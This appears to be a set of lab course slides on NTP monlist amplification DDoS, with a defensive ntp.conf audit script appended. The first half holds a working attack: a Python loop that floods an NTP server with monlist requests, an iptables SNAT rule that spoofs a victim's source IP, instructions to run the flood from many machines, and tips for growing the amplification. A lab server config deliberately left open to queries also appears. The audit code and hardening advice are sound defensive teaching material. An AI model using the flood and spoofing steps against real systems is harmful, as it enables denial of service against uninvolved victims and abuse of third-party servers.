payload = b"""\x17\x00\x03\x2a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while True:
    sock.sendto(payload, ("10.1.2.12", 123))
Hands-on: spoof IP (NTP)
$ sudo iptables -t nat -A POSTROUTING -p udp --dport 123 -j SNAT --to-source $victim_ip
- All UDP packets with destination port 123 (default for NTP) will be altered and their source set to $victim_ip
- The IP can also be spoofed using tools that create raw packets, e.g., Scapy, Nemesis
Hands-on: create DDoS
- Launch on multiple PCs
  - Python version (if the site is still up)
  - Or, if you can, write a program in C/C++
- Try to access the website (or see if it slows down); measure: # time curl -v $victim
Hands-on: increase amplification (NTP)
- Why such small amplification (less than 2x)? The monlist response is the client list
- Goal: increase the client list on the server, but how?
  - Spoof lots of different IPs
  - Send ntpdate -q $ntp_server from each spoofed IP
- The monlist response's maximum client list is 600
Hands-on: virtual network version
If you want to try yourself:
https://sandilands.info/sgordon/ntp-ddos-attack-in-a-virtual-network
https://sandilands.info/sgordon/ping-flooding-dos-attackin-a-virtual-network
Hands-on: setting things up (NTP)
- apt-get install ntp
- Edit /etc/ntp.conf:
  restrict 10.1.2.0 mask 255.255.255.0 nomodify notrap
- service ntp restart
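The restrict line above intentionally leaves query access open so the lab server answers monlist. As an added check that is not part of the slides, here is a Python audit that reads an ntp.conf and reports the restrict scopes from which monlist can still be queried. The rules it encodes use ntpd's documented keywords (noquery or ignore on a restrict line refuse ntpq/ntpdc queries, disable monitor switches the monitor list off altogether); the HARDENED_CONF text, the local-scope exceptions and the function names are this example's own.

```python
LOCAL_SCOPES = {"127.0.0.1", "::1", "localhost"}


def parse_ntp_conf(text):
    """Return (restrict_lines, disabled_features); comments and blank lines are ignored."""
    restricts, disabled = [], set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        words = line.split()
        if words[0] == "restrict" and len(words) > 1:
            restricts.append(words[1:])
        elif words[0] == "disable":
            disabled.update(words[1:])
    return restricts, disabled


def scope_and_flags(words):
    """'10.1.2.0 mask 255.255.255.0 nomodify notrap' -> ('10.1.2.0/255.255.255.0', {...}).
    Address-family switches (-4/-6) are skipped; returns (None, set()) if no scope is left."""
    words = [w for w in words if not w.startswith("-")]
    if not words:
        return None, set()
    if len(words) >= 3 and words[1] == "mask":
        return "%s/%s" % (words[0], words[2]), set(words[3:])
    return words[0], set(words[1:])


def monlist_exposure(text):
    """Scopes whose clients may still run monlist: restrict lines that allow
    queries (neither 'noquery' nor 'ignore'), unless 'disable monitor' is set."""
    restricts, disabled = parse_ntp_conf(text)
    if "monitor" in disabled:
        return []
    exposed = []
    for words in restricts:
        scope, flags = scope_and_flags(words)
        if scope is None or scope in LOCAL_SCOPES or flags & {"noquery", "ignore"}:
            continue
        exposed.append(scope)
    return exposed


# The lab configuration from the slide above: queries are allowed from 10.1.2.0/24.
LAB_CONF = """
restrict 10.1.2.0 mask 255.255.255.0 nomodify notrap
"""

# Hardened configuration (constructed): keep serving time, refuse queries from
# everyone but localhost, and switch the monitor list off so there is nothing to reflect.
HARDENED_CONF = """
disable monitor
restrict default kod nomodify notrap nopeer noquery
restrict 127.0.0.1
restrict ::1
"""

if __name__ == "__main__":
    for name, conf in (("lab", LAB_CONF), ("hardened", HARDENED_CONF)):
        print(name, "monlist reachable from:", monlist_exposure(conf) or "nobody")
```

A partial fix is a common finding: a tightened restrict default line with an older, looser per-subnet line still below it, which this check reports because each restrict line is judged on its own. Upgrading matters too: ntpd disabled monlist by default from 4.2.7p26, so on a current version the audit is a belt-and-braces check rather than the only line of defence.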